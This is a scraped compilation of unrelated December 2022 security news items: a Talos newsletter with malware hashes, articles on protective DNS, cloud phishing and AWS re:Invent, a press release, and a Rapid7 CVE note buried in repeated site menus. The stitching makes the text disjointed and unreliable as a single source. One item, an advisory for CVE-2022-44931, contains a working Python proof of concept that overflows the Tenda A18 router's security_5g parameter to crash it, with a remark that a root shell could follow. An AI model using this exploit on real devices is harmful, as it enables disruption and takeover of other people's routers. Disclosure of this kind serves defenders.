Welcome to this week’s edition of the Threat Source newsletter.
As we hurtle toward the end of another year I get that tightness in my chest – that feeling that I think most, if not all, Threat Source readers get at this time of year. That's

Thursday, December 8, 2022 16:12

Welcome to this week’s edition of the Threat Source newsletter.

As we hurtle toward the end of another year I get that tightness in my chest – that feeling that I think most, if not all, Threat Source readers get at this time of year. That's right, it’s once again the time of year when no matter what your current role or area of expertise you become tech support for your entire family and anyone they’ve ever met. They will give you unsolvable tech problems and expect holiday miracles. I have no particularly stellar advice that will help you. I have no words of wisdom that will keep you from your pain. I have only this – you aren’t alone. Make sure to take copious notes so that you can regale your workplace associates with the highlights and kick off the new year by putting that pain behind you.

Stay tuned next week for our inaugural Year in Review report!

**The one big thing**

Cisco Talos Incident Response shared a white paper on the steps organizations should follow to secure any major event. Outlining ten major event preparation focus areas, for each of the ten identified areas, Talos IR provides a short checklist to ensure that different organizations and committees can ask the right questions to vendors, suppliers and other event participants. Although the checklist can serve as a useful starting point for most of our readers, the complexity of the problem and diverse security requirements will likely require an in-depth analysis to identify all risk avenues.

**Why do I care?**

Cisco Talos IR has successfully participated in a number of global events at both the forefront as well as in supporting roles, to ensure that threats are contained before causing major disruption. This white paper leverages that experience to provide the reader with insight into the challenges, critical aspects and methodologies that can be utilized to achieve a strong sense of cyber security and IR readiness at both strategic and tactical levels.

**So now what?**

Ensure that the proper teams read the white paper, follow the blueprint, and are prepared to handle several types of attacks before, during and after the event. Leverage the ten focus areas to help your organization build appropriate security strategies ahead of major events.

**Top security headlines of the week**

Many endpoint detection and response (EDR) technologies may have a vulnerability in them that gives attackers a way to manipulate the products into erasing any data on installed systems. Or Yair, a security researcher at SafeBreach discovered the issue, Security products, such as EDR tools have super-user rights on systems, which could allow an attacker to wipe almost any file on the system, including system files. Yair disclosed the issue at the Black Hat Europe conference on Wednesday, Dec 7 having notified the vendors between July and August. Vulnerable products included Microsoft Windows Defender, Windows Defender for Endpoint, TrendMicro ApexOne, Avast Antivirus, AVG Antivirus, and SentinelOne. (Darkreading)

Rackspace has confirmed today that a ransomware attack is behind an ongoing Hosted Exchange outage. Rackspace tweeted "Since becoming aware of suspicious activity in our Hosted Exchange environment on 12/2, we’ve determined that the isolated disruption is the result of ransomware and our security team is working with a lead cyber defense firm to investigate." The cloud service provider says it will notify customers if it finds evidence that the attackers gained access to their sensitive information.(Bleepingcomputer)

**Can’t get enough Talos?**

*   https://blog.talosintelligence.com/vulnerability-spotlight-memory-corruption-vulnerability-discovered-in-poweriso/
*   https://blog.talosintelligence.com/vulnerability-spotlight-nvidia-driver-memory-corruption-vulnerabilities-discovered/
*   https://blog.talosintelligence.com/vulnerability-spotlight-callback-technologies-cbfs-filter-denial-of-service-vulnerabilities/
*   https://blog.talosintelligence.com/vulnerability-spotlight-lansweeper-directory-traversal-and-cross-site-scripting-vulnerabilities/

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)  
Mesa, AZ

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA 256:  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256:  
125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

Threat Source newsletter (Dec. 8, 2022): Your uncle clicked every link

To be most effective, protective DNS services need to constantly reassess and rescore domains as additional data comes in.

**Question: What is the importance of a domain score when determining whether a domain is a threat?**

**Dave Mitchell, CTO, Hyas:** Did you know over 93% of all malware employs DNS as a mechanism to identify and contact its command and control (C2) to receive instructions? This is why a truly holistic cybersecurity strategy must include protection from malicious domains.

Being able to properly assess the reputation and safety of a particular domain is critical to preventing breaches. However, these results are often presented in terms of a threat scoring system, which can misleadingly imply static results. To be most effective, solutions in this space need to constantly reassess and rescore domains as additional data comes in. Legacy approaches to protective DNS fail to adapt to the inherently dynamic nature of the Internet. A proactive system must score potential threats in real time, categorizing the DNS traffic based on both static and dynamic indicators of malicious intent.

First, there are the known bad domains. These are domains that have been publicly reported and confirmed to be malicious. Blocking these domains is critical, but it is only a reactive measure. If your organization gets hit during the first wave of an attack that utilizes new malware or a new exploit, these static lists will not help. Using public block lists also leaves you open to attacks from known threats utilizing different infrastructure. Publicly known malicious domains are usually subject to the strictest layer of protection, and communication with them is forbidden. Someone would have to have a very good reason to access one of these domains.

More proactive scoring methods rely on assigning a threat category to all queried domains based on a wide variety of indicators. This is a huge advantage over the static approach, as detecting a threat in its early stages can give administrators the invaluable time they need to block domains involved with the attack before it is executed — thereby rendering it inert. For a solution to do this effectively, it requires advanced threat intelligence capabilities and an intimate understanding of attacker infrastructure and methodology to know how domains are being used and by whom.

Based on this information, advanced protective DNS services monitor domain traffic for suspicious indicators. For example, if a domain is brand new, bought from an unscrupulous registrar, purchased by a buyer from an area associated with cybercrime, and paid for in cryptocurrency, it's probably smart to block it — even if that domain hasn't been used in an attack yet. The number and severity of the suspicious indicators it finds will determine how the system classifies the domain. Sometimes the indicators are low-priority enough to permit communication with the domain, while still getting marked for further analysis. If the domain is later determined to be malicious, further communication will be blocked. Every service provider has its own secret sauce when it comes to scoring domains, so do your homework and demo a number of services before settling on one.

The more high-quality data a service has access to, the more accurate its results are likely to be when combined with continuous analysis. This is key for generating meaningful scores that maintain the delicate balance between overly aggressive blocking — annoying users and potentially slowing down the pace of business — or even worse, mistakenly letting malicious communication through, defeating the purpose of implementing the protection in the first place.

Beyond these built-in protections, administrators can usually set up custom lists or policies that make the system alert them and/or outright block DNS requests if a domain has multiple negative traits that meet or exceed established parameters. Once alerted, administrators can investigate the incident and proactively deal with it before it causes damage. An advanced protective DNS service also gives you a level of control in enforcing policies, as you can preemptively block certain DNS communications — for example, instituting a blanket block on certain hacker hotbeds. If clean traffic gets caught up in these custom rules, it is easy enough to add domains to the solution's allow list.

Every provider approaches the overall process of scoring domains differently — quite radically in some cases. Bare-minimum (sometimes free) protective DNS services often rely on static, publicly available lists, while more sophisticated services incorporate data from premium intelligence services to stay a bit more current. But the top options use advanced threat intelligence, based on examination of prior attacks and dynamic analysis, to predict domain risk. With the first two types, you are operating from a reactive stance and will almost certainly fall victim to an attack at some point. However, an advanced protective DNS helps secure your assets from new and emerging threats, giving your enterprise the upper hand against threat actors.

How Do I Use the Domain Score to Determine Whether a Domain Is a Threat?

Phishing has long been one of the best ways to gain access to a target organization. It didn't used to be this way. In the early days of computer security, the remote code exploit (RCE) was the preferred method of gaining access, as it required no user interaction. In fact, if something required user interaction, it wasn't considered a serious threat. Better security practices started to take hold, and the RCE method of access became much more challenging. And it turned out, getting users to interact was easier than ever imagined.

The same cycle has started to repeat itself with on-premises targets. Organizations have started to make advances in securing their internal networks against using endpoint detection and response (EDR), and other technologies are better equipped to detect malware and lateral movement. While attacks are becoming more difficult, it's by no means an ineffective strategy for an attacker yet. Deploying ransomware and other forms of malware is still a common outcome.

**Why Your Cloud Infrastructure Is a Top Target for Phishing Attacks**

The cloud has given phishers a whole new frontier to attack, and it turns out it can be very dangerous. SaaS environments are ripe targets for phishing attacks and can give the attacker a lot more than access to some emails. Security tools are still maturing in this environment, which offers attackers a window of opportunity where methods such as phishing attacks can be very effective.

**Phishing Attacks Targeting Developers and Software Supply Chain**

As we saw recently, Dropbox had an incident due to a phishing attack against its developers. They were tricked into giving their Github credentials to an attacker by a phishing email and fake website, despite multifactor authentication (MFA). What makes this scary is that this wasn't just a random user from sales or another business function, it was developers with access to a lot of Dropbox data. Thankfully, the scope of the incident doesn't appear to affect Dropbox's most critical data.

GitHub, and other platforms in the continuous integration/continuous deployment (CI/CD) space, are the new "crown jewels" for many companies. With the right access, attackers can steal intellectual property, leak source code and other data, or conduct supply chain attacks. It goes even farther, as GitHub often integrates with other platforms, which the attacker may be able to pivot. All of this can happen without ever touching the victim's on-prem network, or many of the other security tools that organizations have acquired, since it is all software-as-a-service (SaaS)-to-SaaS.

Security in this scenario can be a challenge. Every SaaS provider does it differently. A customer's visibility into what happens in these platforms is often limited. GitHub, for example, only gives access to its Audit Log API under its Enterprise plan. Getting visibility is only the first hurdle to overcome, the next would be to make useful detection content around it. SaaS providers can be quite different in what they do and the data that they provide. Contextual understanding of how they work will be required to make and maintain the detections. Your organization may have many such SaaS platforms in use.

**How Do You Mitigate Risks Associated With Phishing in the Cloud?**

Identity platforms, such as Okta, can help mitigate the risk, but not completely. Identifying unauthorized logins is certainly one of the best ways to discover phishing attacks and respond to them. This is easier said than done, as attackers have caught on to the common ways of detecting their presence. Proxy servers or VPNs are easily used to at least appear to come from the same general area as the user in order to defeat country or impossible travel detections. More advanced machine learning models can be applied, but these are not yet widely adopted or proven.

Traditional threat detection is starting to adapt to the SaaS world as well. Falco, a popular threat detection tool for containers and cloud, has a plug-in system that can support nearly any platform. The Falco team has already released plug-ins and rules for Okta and GitHub, among others. For example, the GitHub plug-in has a rule that triggers if any commits show signs of a crypto miner. Levering these purpose-built detections is a good way to get started in bringing these platforms into your overall threat detection program.

**Phishing Is Here to Stay**

Phishing, and social engineering in general, will never be left behind. It has been an effective attack method for years, and will be for as long as people communicate. It is critical to understand that these attacks are not limited to the infrastructure you own or manage directly. SaaS is especially at risk due to the lack of visibility most organizations have to what actually happens on those platforms. Their security cannot be written off as someone else's problem, as a simple email and fake website is all it takes to get access to those resources.

Phishing in the Cloud: We're Gonna Need a Bigger Boat

Tenda A18 v15.13.07.09 was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

Permalink

Cannot retrieve contributors at this time

**Tenda A18 V15.13.07.09 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address: https://www.tenda.com.cn/download/detail-2760.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiBasicSet, the user can control security\_5g, which will be copied to param\_5g by the strcpy function. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'security\_5g=' + p1

p3 \= b"POST /goform/WifiBasicSet" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44931: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Startup raises $8.5 million in seed funding led by Ten Eleven Ventures.

**CHARLESTON, S.C., Dec. 8, 2022 /PRNewswire/ —** Interpres Security, a company dedicated to helping companies optimize their security performance with a comprehensive new approach to managing the defense surface, announced its emergence from stealth alongside $8.5M in seed financing led by Ten Eleven Ventures. The Interpres Security platform offers a customized, continuous, and threat-informed analysis of an organization's detection and mitigation capabilities and provides automated security engineering directives based on this evaluation, ultimately enabling a hardened security posture in the most efficient manner possible.

To address the expanding number of cybersecurity threats, organizations now use an average of 76 tools in their security stack. Despite this level of investment, organizations still do not know how effective this tooling is against their specific and expanding threat profile. Without a clear picture of the most relevant threats or how well their current tools work against them, organizations do not have a complete view of how well-defended they are.

After experiencing a systems breach firsthand at a classified security operations center, members of the Interpres Security founding team developed a new Threat Centric Methodology to validate the effectiveness of all of the security vendors in the environment. This approach proved successful, and later the same methodology became the genesis for Interpres Security's automation of these capabilities into their new platform.

Interpres Security currently integrates the MITRE ATT&CK framework to prioritize threat coverage based on the adversaries most likely to target an organization, the malware and techniques those adversaries use, and the prevalence of those attacks as seen in the wild. It then recommends mitigations, telemetry collection strategies, and detection logic best suited to fill the prioritized gaps in coverage across the enterprise to detect and mitigate threats most likely to target the organization. It does all this while utilizing the organization's existing investment in cybersecurity products and solutions. Once the defense ecosystem is optimized, Interpres maintains this state through a situational awareness dashboard that detects drift in configuration and changes to risk posture while offering detailed board-level reporting.

"Until now, only large security engineering teams have even been able to attempt to analyze, validate, and optimize an organization's specific security toolset and processes. However, the detailed analysis and threat intelligence needed is extremely time-consuming and manually intensive to complete. The capabilities that we have automated within the Interpres platform goes beyond the scope of what humans can complete regularly, in real-time," said Nick Lantuh, Chief Executive Officer and Co-Founder at Interpres Security and former Founder and President of NetWitness (acquired by EMC in 2011). "It's time for a new approach. Automation and threat-informed prioritization are necessary to properly assess, configure, optimize and align current security tools to optimally defend against advanced threats in a timely manner. That's the value of the Interpres platform."

"We see CISOs regularly struggle to get a handle on which security tools are most effective for their organization's specific needs," said Mark Hatfield, General Partner at Ten Eleven Ventures and new board member at Interpres Security. "They want to hold the vendors accountable for what they've promised - to understand how well their tools stand up to threats they are most likely to face. The exceptional team at Interpres Security has developed a platform that does exactly that - help companies 'shrink the stack', get the most out of their existing cybersecurity investments, understand where they are and are not protected, rationalize product investments and harden their defenses."

**About Interpres Security**

Interpres Security makes security performance intelligible and provable for the enterprise with a comprehensive new approach to managing the defense surface. With Interpres, security teams can take a threat-informed perspective to understand what their current tools can detect and defend against, identify gaps and inefficiencies, and iteratively improve their security posture with a data-driven and custom tailored approach. Interpres Security is backed by top cybersecurity specialist investor, Ten Eleven Ventures. To learn more and request a demonstration of the platform, visit their website at InterpresSecurity.com and follow the company on LinkedIn or Twitter.

**About Ten Eleven Ventures**

Ten Eleven Ventures is the original cybersecurity-focused, global, stage agnostic investment firm. The firm finds, invests, and helps grow top cybersecurity companies addressing critical digital security needs, tapping its team, network, and experience to help build successful businesses. Since its founding, Ten Eleven Ventures has raised over $US 1 billion and made over 40 cybersecurity investments across stages worldwide, including KnowBe4, Darktrace, Twistlock, Verodin, Cylance, and Ping Identity. For more information, please visit www.1011vc.com or follow us on Twitter @1011vc.

Interpres Security Emerges from Stealth to Help Companies to Optimize Security Performance

A free resource, updated monthly, lists the most-popular, highly rated OSS projects.

In the past decade or so, open source software has become a critical component of many companies' tech stacks. The proliferation of cloud computing and artificial intelligence (AI) accelerated this trend, making open source projects such as Kubernetes, TensorFlow, Jenkins, and OpenCV more attractive to developers and infrastructure teams alike.

And security operations are no exception. Open source software has found its way into cybersecurity engineering and operations. Snort, OpenSSL, Yara, Wireshark, etc., are often found in organizations' arsenal of security tools. Open source is now fundamental to security operations, and building, supporting, and using open source tools is an integral part of InfoSec culture.

To better track the proliferation of open source software in cybersecurity infrastructure and applications, Andrew Smyth of Atlantic Bridge and I created The Open Source Security Index as a free resource for developers and security engineers to find and identify the best open source security technology. The index lists the top 100 most popular and fastest-growing security projects on GitHub. We emphasize _fast growing_ as we believe modern security operations are different from security in the past, when most deployments happened on-premises. As such, many of the fast-growing OSS projects are newer initiatives designed for modern infrastructure environments.

To build this index, we use the GitHub API to pull projects based on tags and topics, and manually added projects that lack labels. To constrain our scope, we limited the search to projects that are considered direct security tools. Those that have security implications but fall more into infrastructure capabilities, such as Terraform, Elastic, Istio, and Envoy, are not included here.

**How We Ranked the Entries**

Once we had the raw list, we ranked entries based on an "Index Score," which is a weighted average of six metrics retrieved from GitHub. They include:

*   Number of stars: 30%
*   Number of contributors (excluding bots and anonymous accounts): 25%
*   Number of commits the project had in the last 12 months: 25%
*   Number of watchers: 10%
*   Change in the number of watchers over the last month: 5%
*   Number of forks: 5%

Based on this scoring methodology, we list the top 100 GitHub projects on the The Open Source Security Index website. The index is an evolving, live project. We will refresh the data monthly to keep the list current.

While the top 25 list includes familiar tools like Metasploit, Wireshark, and OS Query, there are also relatively new entrants, such as Cilium, Checkov, and Calico, that are designed specifically for modern and cloud-native infrastructure.

Looking across the top 25 list, a few interesting trends emerge. They are:

*   **Attack and red-team open source tools remain popular:** Projects that provide effective attack and testing tools are prominently positioned on the list. Metasploit, OSS Fuzz, Atomic Red Team, and Zap are a few examples.
*   **Security for modern infrastructure is gaining popularity:** Unlike traditional security utilities, projects such as Cilium, Trivy, Calico, and Sysdig are becoming increasingly popular. Those projects are designed to work with newer, cloud-native infrastructure, such as Kubernetes, containers, and microservices. The fact that these projects are listed among the most popular shows that cloud computing is now mainstream with security operations.
*   **Automation and "as-code" workflow utilities have emerged:** It's also worth noting that projects that enable automation and "as-code" workflows have also appeared in the top list. For instance, Nuclei, a project that focuses on vulnerability-management-as-code, is a fast-growing project used by bug researchers, red teams, and defenders. Sigma is another project that enables automation and sharing of attack detection methods.

We believe that the evolution of open source security (OSS) will follow the same trajectory as enterprise infrastructure in embracing OSS models. An increasing number of security practitioners choose open source as a fundamental strategy because of its extensibility, flexibility, and transparency of implementation. In addition, sophisticated security teams have adopted the "shift-left" mindset, where managing security policies and operations is like managing "code." To this end, an open source strategy provides a clear advantage compared with the traditional way of developing and deploying proprietary software artifacts.

We created this index because we had a challenging time finding a good, representative list of open source security projects. Although imperfect, this index represents a starting point to build a structured and comprehensive list of meaningful open source tools for security practitioners to consider. We worked with many open source creators to build this list, and we welcome feedback at @OSecurityIndex.

Where to Find the Best Open Source Security Technology

Rapid7 Nexpose versions prior to 6.6.172 failed to reliably validate the authenticity of update contents. This failure could allow an attacker to provide a malicious update and alter the functionality of Rapid7 Nexpose. The attacker would need some pre-existing mechanism to provide a malicious update, either through a social engineering effort, privileged access to replace downloaded updates in transit, or by performing an Attacker-in-the-Middle attack on the update service itself.

*   Platform
    
    *   Platform Subscriptions
    *   Cloud Risk Complete
        
        Manage Risk
        
    *   Threat Complete
        
        Eliminate Threats
        
    
*   Products
    
    *   Insight Platform Solutions
    *   
    *   Threat Intelligence
        
        THREAT COMMAND
        
    *   Vulnerability Management
        
        INSIGHTVM
        
    *   Dynamic Application Security Testing
        
        INSIGHTAPPSEC
        
    *   Orchestration & Automation (SOAR)
        
        INSIGHTCONNECT
        
    *   Cloud Security
        
        INSIGHTCLOUDSEC
        
    
    *   More Solutions
    *   Penetration Testing
        
        METASPLOIT
        
    *   On-Prem Vulnerability Management
        
        NEXPOSE
        
    *   Digital Forensics and Incident Response (DFIR)
        
        Velociraptor
        
    
*   Services
    
    *   MANAGED SERVICES
    *   Detection and Response
        
        24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
        
    *   Vulnerability Management
        
        PERFECTLY OPTIMIZED RISK ASSESSMENT
        
    *   Application Security
        
        SCAN MANAGEMENT & VULNERABILITY VALIDATION
        
    
    *   OTHER SERVICES
    *   Security Advisory Services
        
        PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
        
    *   Product Consulting
        
        QUICK-START & CONFIGURATION
        
    *   Training & Certification
        
        SKILLS & ADVANCEMENT
        
    *   Penetration Services
        
        TEST YOUR DEFENSES IN REAL-TIME
        
    *   IoT Security Testing
        
        SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
        
    *   Premium Support
        
        PRIORITY HELP & FASTER SOLUTIONS
        
    
*   Support & Resources
    
    *   SUPPORT
    *   Support Portal
        
        CONTACT CUSTOMER SUPPORT
        
    *   Product Documentation
        
        EXPLORE PRODUCT GUIDES
        
    *   Release Notes
        
        DISCOVER THE LATEST PRODUCT UPDATES
        
    *   
    
    *   RESOURCES
    *   Fundamentals
        
        FOUNDATIONAL SECURITY KNOWLEDGE
        
    *   Blog
        
        THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
        
    *   Resources Library
        
        E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
        
    *   Extensions Library
        
        PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
        
    *   Partners
        
        RAPID7 PARTNER ECOSYSTEM
        
    *   Webcasts & Events
        
        UPCOMING OPPORTUNITIES TO CONNECT WITH US
        
    *   Vulnerability & Exploit Database
        
        SEARCH THE LATEST SECURITY RESEARCH
        
    
*   Company
    
    *   OVERVIEW
    *   
    *   Leadership
        
        EXECUTIVE TEAM & BOARD
        
    *   News & Press Releases
        
        THE LATEST FROM OUR NEWSROOM
        
    *   
    *   Our Customers
        
        Their Success Stories
        
    
    *   COMMUNITY & CULTURE
    *   Social Good
        
        OUR COMMITMENT & APPROACH
        
    *   Rapid7 Cybersecurity Foundation
        
        BUILDING THE FUTURE
        
    *   Diversity, Equity & Inclusion
        
        EMPOWERING PEOPLE
        
    *   Open Source
        
        STRENGTHENING CYBERSECURITY
        
    *   Public Policy
        
        ENGAGEMENT & ADVOCACY
        
    
*   RESEARCH
*    Sign In

*   All Products
    
    *   AppSpider
    *   Insight Agent
    *   InsightAppSec
    *   InsightCloudSec
    *   InsightConnect
    *   Insight Platform
    *   InsightIDR
    *   Insight Network Sensor
    *   InsightOps
    *   InsightVM
    *   Metasploit
    *   Nexpose
    *   tCell
    *   Managed Services
    

*   Platform
    
    *   Platform Subscriptions
    *   Cloud Risk Complete
        
        Manage Risk
        
    *   Threat Complete
        
        Eliminate Threats
        
    
*   Products
    
    *   Insight Platform Solutions
    *   
    *   Threat Intelligence
        
        THREAT COMMAND
        
    *   Vulnerability Management
        
        INSIGHTVM
        
    *   Dynamic Application Security Testing
        
        INSIGHTAPPSEC
        
    *   Orchestration & Automation (SOAR)
        
        INSIGHTCONNECT
        
    *   Cloud Security
        
        INSIGHTCLOUDSEC
        
    
    *   More Solutions
    *   Penetration Testing
        
        METASPLOIT
        
    *   On-Prem Vulnerability Management
        
        NEXPOSE
        
    *   Digital Forensics and Incident Response (DFIR)
        
        Velociraptor
        
    
*   Services
    
    *   MANAGED SERVICES
    *   Detection and Response
        
        24/7 MONITORING & REMEDIATION FROM MDR EXPERTS
        
    *   Vulnerability Management
        
        PERFECTLY OPTIMIZED RISK ASSESSMENT
        
    *   Application Security
        
        SCAN MANAGEMENT & VULNERABILITY VALIDATION
        
    
    *   OTHER SERVICES
    *   Security Advisory Services
        
        PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES
        
    *   Product Consulting
        
        QUICK-START & CONFIGURATION
        
    *   Training & Certification
        
        SKILLS & ADVANCEMENT
        
    *   Penetration Services
        
        TEST YOUR DEFENSES IN REAL-TIME
        
    *   IoT Security Testing
        
        SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD
        
    *   Premium Support
        
        PRIORITY HELP & FASTER SOLUTIONS
        
    
*   Support & Resources
    
    *   SUPPORT
    *   Support Portal
        
        CONTACT CUSTOMER SUPPORT
        
    *   Product Documentation
        
        EXPLORE PRODUCT GUIDES
        
    *   Release Notes
        
        DISCOVER THE LATEST PRODUCT UPDATES
        
    *   
    
    *   RESOURCES
    *   Fundamentals
        
        FOUNDATIONAL SECURITY KNOWLEDGE
        
    *   Blog
        
        THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE
        
    *   Resources Library
        
        E-BOOKS, WHITE PAPERS, VIDEOS & BRIEFS
        
    *   Extensions Library
        
        PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY
        
    *   Partners
        
        RAPID7 PARTNER ECOSYSTEM
        
    *   Webcasts & Events
        
        UPCOMING OPPORTUNITIES TO CONNECT WITH US
        
    *   Vulnerability & Exploit Database
        
        SEARCH THE LATEST SECURITY RESEARCH
        
    
*   Company
    
    *   OVERVIEW
    *   
    *   Leadership
        
        EXECUTIVE TEAM & BOARD
        
    *   News & Press Releases
        
        THE LATEST FROM OUR NEWSROOM
        
    *   
    *   Our Customers
        
        Their Success Stories
        
    
    *   COMMUNITY & CULTURE
    *   Social Good
        
        OUR COMMITMENT & APPROACH
        
    *   Rapid7 Cybersecurity Foundation
        
        BUILDING THE FUTURE
        
    *   Diversity, Equity & Inclusion
        
        EMPOWERING PEOPLE
        
    *   Open Source
        
        STRENGTHENING CYBERSECURITY
        
    *   Public Policy
        
        ENGAGEMENT & ADVOCACY
        
    
*   RESEARCH

*   Sign In

*   Documentation
*   All Products
    
    *   AppSpider
    *   Insight Agent
    *   InsightAppSec
    *   InsightCloudSec
    *   InsightConnect
    *   Insight Platform
    *   InsightIDR
    
    *   Insight Network Sensor
    *   InsightOps
    *   InsightVM
    *   Metasploit
    *   Nexpose
    *   tCell
    *   Managed Services

CVE-2022-4261: Nexpose Release Notes

Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.

CVE-2022-23491: concerns about Trustcor

At AWS re:Invent last week, the cloud giant previewed security services including Amazon Security Lake for security telemetry, Verified Permissions for developers, and a VPN bypass service.

Cloud threats will continue to grow and proliferate in 2023, but organizations can meet the challenges head-on with the right security fundamentals in place, Amazon Web Services CISO CJ Moses said during AWS re:Invent 2022 conference last week.

Malicious activity is on the rise: The volume of DDoS events in AWS between January and September of this year rose 35% compared with the same period in 2021. AWS saw a 256% increase in compromised instances compared with the fourth quarter of 2021.

AWS unveiled new security tools to help enterprise security teams with analyzing security telemetry, permissions management, and key management.

**Gathering Threat Telemetry**

First up was Amazon Security Lake to manage threat intelligence data. AWS CEO Adam Selipsky said Amazon Security Lake would allow organizations to gather security telemetry and data from many sources, clean it up, and make it accessible for analysis. The challenge lies in the fact that security data exists in multiple formats. The new Open Cybersecurity Schema Framework standard, announced last August during Black Hat USA, can be used to normalize security logs and events data across a wide range of products and services, Selipsky said.

Asked whether supporting OCSF members have conducted comprehensive interoperability tests or certification efforts, Splunk distinguished engineer Paul Agbabian explained to Dark Reading how the data is normalized. 

"For an event class to be considered in OCSF, there must be a real implementation of the class via one of the member's example logs," he said. "In addition, OCSF uses a server that can test each implementation of the schema for validation, which includes showing notable errors and violations."

"Increasing threats and risks continue driving the shift to the cloud, where security will be built into everything organizations do up and down their technology stack and across their teams," Moses said. "More and more security can be thought of as a data science problem."

AWS said FINRA, Salesforce, and Tinder are the first customers using Amazon Security Lake. Fernando Montenegro, a senior principal analyst at Omdia, said Amazon Security Lake was the most significant new security offering announced at last week's conference.

"Security Lake is obviously notable as it addresses some of the security 'undifferentiated heavy lifting' that AWS likes to address," Montenegro told Dark Reading. "It's still early, but the expectation is that it can help simplify security analytics at scale. The use of the OCSF standard is also notable, as it can herald easier data integration even outside of AWS environments."

**Verified Permissions for Developers**

A preview of Amazon Verified Permissions is now available, which Moses described as a scalable, fine-grained permissions management and authorization service for custom applications. 

"It gives developers a consistent way to define and manage fine-grained permissions across applications, simplifies changing permission roles without a need to change code, while also improving visibility to permissions," he explained.

Amazon Verified Permissions gives application administrators "a comprehensive audit capability that scales millions of policies using automated reasoning," Moses added. "Authorization requests running through Amazon Verified Permissions are evaluated in milliseconds to provide dynamic real-time decisions."

**Remote Access Without a VPN**

Amazon also released the preview of AWS Verified Access, a new connectivity service that provides secure remote access to corporate applications without requiring a VPN. According to AWS, the new service only grants access to applications if users and their devices meet defined security requirements.

AWS noted that Verified Access validates each application request, regardless of user or network, before granting access. 

"AWS Verified Access should help with the burden of accessing AWS resources in a 'zero trust' manner,'" Omdia's Montenegro said.

**External Key Store (XKS) for AWS KMS**

Amazon also announced its AWS Digital Sovereignty Pledge, which the company describes "as its commitment to offering all AWS customers the most advanced set of sovereignty controls and features available in the cloud."

Previously, customers have had to choose between "the full power of AWS and a feature-limited sovereign cloud solution that could hamper their ability to innovate, transform, and grow. We firmly believe that customers shouldn't have to make this choice," explained AWS senior VP Matt Garman in a blog post.

Effectively, AWS is promising to enable its complete offerings to maintain the growing set of digital sovereignty industry and regional regulations. Moses said the new External Key Store (XKS) for the AWS Key Management Service (KMS) supports the pledge because it lets organizations store and utilize their encryption keys outside of AWS.

"Customers can now store AWS KMS customer-managed keys outside of AWS on hardware security modules, whether they operate on-premises or anywhere else they would like to do so," he said. "XKS supports all the critical features of KMS and works with the over 100 AWS services that already integrate with KMS customer keys."

A user can encrypt data with external keys for most AWS services that support AWS KMS customer-managed keys, including Amazon EBS, AWS Lambda, Amazon S3, Amazon DynamoDB, and over 100 more services. The external key store forwards API calls to securely connect with a customer's hardware security module (HSM). According to an AWS blog post, the data describing the key never leaves the HSM.

Key Security Announcements From AWS re:Invent 2022

By Habiba Rashid
The bank confirmed that it had "experienced an unprecedented cyber attack from abroad."
This is a post from HackRead.com Read the original post: IT Army of Ukraine Hit Russian Banking Giant with Crippling DDoS Attack

